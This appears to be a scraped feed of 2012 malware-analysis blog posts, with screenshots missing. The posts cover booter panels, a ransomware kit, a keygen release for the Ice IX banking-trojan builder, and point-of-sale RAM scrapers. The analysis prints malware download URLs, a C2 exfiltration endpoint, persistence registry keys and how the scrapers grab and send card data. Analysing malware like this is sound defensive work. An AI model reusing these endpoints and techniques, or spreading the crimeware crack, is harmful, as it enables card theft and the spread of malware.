
UDP Flooders:


Booter:

Stealer panel:

Some malwares crypted with .NET crap:

???

Typical lamer nothing more to say.

Multi Locker

November 25, 2012, 12:14 pm
$
0
0
I've seen it on kernelmode for the first time on a post, i've looked fastly just the panel...

Dashboard:

Edit a file:

Rename:

More recent, a friend gived me this link via IRC: androidauthorization.com/bin/disk.exe


Oh... it's another RunPE crap:

When unpacked, just 15 AV detect it: https://www.virustotal.com/file/978a996ddf98f7a093fd4b8d693622a3e32486e6d6a93c3b4d672693a7d49cb8/analysis/1353868360/
as winlock?! let's have a look.
A routine decode the config strings inside:


Then it retrieves the address of functions
And start the work, hide the file:

Add a registry persistence in \Run and delete \SafeBoot


Create windows:

If program manager is found, terminate it:

Set the windows topmost:

Test internet:

Prepare the landing:
Then i've run F9...

Lame landing:


It also call the gate to know if we kill the process or not

Multi Locker landing editor for this sample:

getunlock.php:

tds.php:

Oh... well, another winlock kit ripped from another winlock kit, i'm not amused to find sale thread and shit, this kit is designed to fail, my net is slow as fuck for the moment i will post the rest of pictures from the C&C later.

 Dashboard:

Analytics botnet:

Billing:

 Landing:

 Manual:

 Support:

 Change password:

Ice.IX.v1.2.5.Keygen-RED/Ice.IX.v1.2.6.Keygen-RED

November 26, 2012, 7:03 pm
$
0
0
Haven't released a crack since a quite old time now...


Ice IX 1.2.5: f22e47deb86d6ddaaced55eb5f29c7e7
Keygen: f2298e9b2b445014414746a278826ad6
Ice IX 1.2.6: cc474ee65cfb0a498add7863e9df799b
Keygen: 218ce56c9e126939a950daaa3dd27953


Point-of-Sale and memory scrappers

December 7, 2012, 12:54 am
$
0
0
I got access to a compromised POS recently (thanks Zora)

POS Designer:

POS interface (password protected)

The guys who hacked it first leaved alot of traces... gentlemen i present to you... rome0/Amnesia

For the story, rome0 is a French carder, you can read a repport about him here: http://trackingcybercrime.blogspot.fr/2012/05/inside-french-cybercriminel.html


The TO TXT.exe file is interesting
iZER0x... hmm yes i've already see this.
*\AC:\Users\iZER0x\Desktop\supern0va\france\Project1.vbp
*\AC:\Users\iZER0x\Desktop\shitz\PickPockeT\bot\xD\New Folder\Project1.vbp

More strings:
This file is actually a downloader/dropper for rdasrv but the site look's dead.
vcc-vba.com/a.dll
vcc-vba.com/x.exe

scumware.org have an hash for x.exe
That was not really hard to find i even already posted it on a forum.

After searching the sample no surprise... rdasrv.

vcc-vba advert:

I will not explain you the life about how rdasrv work, Sophos guys already expalained it here:
http://nakedsecurity.sophos.com/2011/11/30/targeted-attacks-steal-credit-cards-from-hospitality-and-educational-institutions/


ESET is broken on the compromised system:

"I got access to a teller machine"

"Still Looking URL from RDP website"

"need Hacker with good knowledge into Pos malware/Decrypting Pos"

You can also view mmon.exe, file is the same as my previous post about POS malware:
http://www.xylibox.com/2012/03/pos-carding.html

Some logs was saved.


dbgview log (at first i've not understand why DebugView was here):

Task scheduler:
Probably used to run a ram scrapper each x mins.

mm1.exe is one of these ram scrappers found, first time i see this one.

Algo to detect track2:


Show the track2 in console:



CBTools:

I've found also a good ram scrapper named 'mm_bot.exe' probably a custom piece.
When run, it copy himself in %APPDATA%/Google/svchost.exe add registry persistance (HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load), run the copy and melt the original file then it read process for track2, get pc infos encode everything with a lame key and send that to a server.
(sad, server is dead)
Everything hidden but infos are show via OutputDebugStringW, at first i've not understand why i've found debugview but now it's clear for me.


Get username/pc name:

Scan process


Track2 grab:

Encode grabbed data

 Send dumps via POST req to 109.75.176.63/forum/post.php

AV seem don't know it, 3/45 all generic according to VirusTotal: https://www.virustotal.com/file/bea36957edeab025bdad5a04daa317f913212103a2bde608529ea18d978e7d45/analysis/1354666164/

RAM scrapers are used mainly to supply carding shops and costs from 100$ to 3000$ depending on features.
If you looks for samples: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1756



Viewing all 128 articles
Browse latest View live
Search